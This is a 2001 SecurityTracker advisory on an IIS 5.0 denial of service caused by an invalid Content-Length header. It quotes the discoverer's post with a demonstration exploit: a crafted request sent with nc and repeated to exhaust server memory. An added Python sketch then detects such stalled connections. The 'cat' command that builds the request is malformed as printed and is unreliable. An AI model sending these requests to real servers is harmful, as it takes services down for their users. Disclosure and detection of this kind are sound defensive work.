Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server
Vendors:   Microsoft
Microsoft Internet Information Server Can Be Crashed By Remote Users With HTTP Requests Containing Invalid Content-Length Values
SecurityTracker Alert ID:  1002957
SecurityTracker URL:  http://securitytracker.com/id/1002957
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Dec 12 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 5.0
Description:   A vulnerability was reported in Microsoft's Internet Information Server. A remote user can cause the server to consume all available memory by sending a special HTTP request.

A remote user can send an HTTP request that contains an invalid "Content-Length:" field to the server to cause the server to wait with the connection open.

A demonstration exploit transcript is provided:

$ cat " GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic" >bogus.txt

$ nc 192.168.0.10 80 <bogus.txt &

If a remote user issues enough requests, the server can be made to consume all available memory.

Impact:   A remote user can issue an HTTP request that will cause the server to leave the connection open and wait. If the remote user sends enough of these requests, the server can be made to consume all available memory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Exception handling error, Resource error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  Microsoft IIS/5 bogus Content-length bug.


Let's say that it's a bug, not a security flaw, but it can probably lead
to a denial of service with some tweaking.
When you send a bad request to a Microsoft IIS/5.0 server, it gives you the
error and closes the connection, like when you fail to authenticate.
Well... let's take a look at a normal request:
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Authorization: Basic

And then let's add a "Content-Length: 5300643" field.

When you send the new request to the server it hangs there waiting for
something to happen and never closes the connection.

Let's try this:
$ cat " GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic" >bogus.txt

$ nc 192.168.0.10 80 <bogus.txt &
$ ps x
      PID    PPID    PGID     WINPID  TTY  UID    STIME COMMAND
      696       1     696        696  con  500 12:22:37 /usr/bin/bash
     2464     696    2464       2464  con  500 12:23:56 /usr/bin/nc
     2532     696    2532       1552  con  500 12:29:16 /usr/bin/ps

$ netstat -an |grep 192.168.0.10
  TCP    192.168.0.4:2479       192.168.0.10:80        ESTABLISHED

Now you have a waiting open connection. You can open as many as you
want. The server never stops the connections and I have seen no timeout.

Well, I left this here.

Thanks for taking the time to read.

Ivan Hernandez
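
The following is an added example, not part of the original advisory or of the source message: a detection sketch for the condition described above, where a request declares a Content-Length, the body never arrives, and the connection is held open. The connection-record fields (id, client, head, body_received, idle_s), the thresholds and the sample table are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Thresholds are assumptions for this example; tune them to the site's traffic.
BODY_IDLE_LIMIT = 30   # seconds a connection may sit idle while body bytes are owed
PER_CLIENT_LIMIT = 3   # stalled connections from one client before it is reported

def declared_length(head: bytes):
    """Content-Length declared in a raw request head: int, None if absent,
    or -1 if the value is non-numeric or repeated with conflicting values."""
    values = re.findall(rb"(?im)^content-length[ \t]*:[ \t]*(.*?)[ \t]*\r?$", head)
    if not values:
        return None
    if len(set(values)) > 1 or not values[0].isdigit():
        return -1
    return int(values[0])

def is_stalled(conn: dict) -> bool:
    """True when the client still owes body bytes and has been idle too long."""
    want = declared_length(conn["head"])
    if want is None or want < 0:
        return False  # no body expected, or malformed (to be rejected elsewhere)
    return conn["body_received"] < want and conn["idle_s"] > BODY_IDLE_LIMIT

def report(conns):
    """Return (ids of connections to close, clients at or over the limit)."""
    stalled = [c for c in conns if is_stalled(c)]
    per_client = Counter(c["client"] for c in stalled)
    noisy = sorted(ip for ip, n in per_client.items() if n >= PER_CLIENT_LIMIT)
    return [c["id"] for c in stalled], noisy

# Constructed sample: a connection table as a front-end proxy or monitor might hold it.
HEAD = (b"GET /testfile HTTP/1.1\r\nHost: 192.168.0.10\r\n"
        b"Connection: Keep-Alive\r\nContent-Length: 5300643\r\n\r\n")
UPLOAD = b"POST /upload HTTP/1.1\r\nHost: 192.168.0.10\r\nContent-Length: 2048\r\n\r\n"
PLAIN = b"GET / HTTP/1.1\r\nHost: 192.168.0.10\r\n\r\n"
SAMPLE = [
    {"id": 1, "client": "192.168.0.4", "head": HEAD, "body_received": 0, "idle_s": 400},
    {"id": 2, "client": "192.168.0.4", "head": HEAD, "body_received": 0, "idle_s": 120},
    {"id": 3, "client": "192.168.0.4", "head": HEAD, "body_received": 0, "idle_s": 95},
    {"id": 4, "client": "192.168.0.7", "head": UPLOAD, "body_received": 1024, "idle_s": 2},
    {"id": 5, "client": "192.168.0.9", "head": PLAIN, "body_received": 0, "idle_s": 300},
    {"id": 6, "client": "192.168.0.8", "head": HEAD, "body_received": 0, "idle_s": 45},
]

if __name__ == "__main__":
    to_close, noisy_clients = report(SAMPLE)
    print("close:", to_close, "report:", noisy_clients)
```

Connection 5 is idle but owes no body, so it is left to the ordinary keep-alive timeout rather than flagged here.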
